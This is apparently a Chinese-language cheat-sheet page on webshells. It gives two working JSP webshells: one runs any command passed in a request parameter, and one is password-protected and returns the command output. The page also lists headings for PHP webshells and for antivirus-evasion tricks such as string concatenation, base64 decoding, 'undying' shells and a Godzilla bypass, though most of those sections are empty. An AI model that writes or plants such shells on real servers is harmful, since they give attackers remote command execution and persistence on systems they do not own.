各类Webshell
JSP_Webshell
1.无回显的命令执行
<%Runtime.getRuntime().exec(request.getParameter("i"));%> //`i`输入要执行的命令2.有回显带密码的命令执行
<%
if("023".equals(request.getParameter("pwd"))){ //"pwd"是Webshell的密码
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>3.文件写入
ISO-8859-1输入
UTF-8输入
Web目录写入
PHP_Webshell
Webshell的使用


Webshell免杀方式
1.assert()
2.采用字符串拼接
3.创建函数
4.request请求
5.构造类
6.base64解密
7.不死马
工具免杀
BypassGodzilla



最后更新于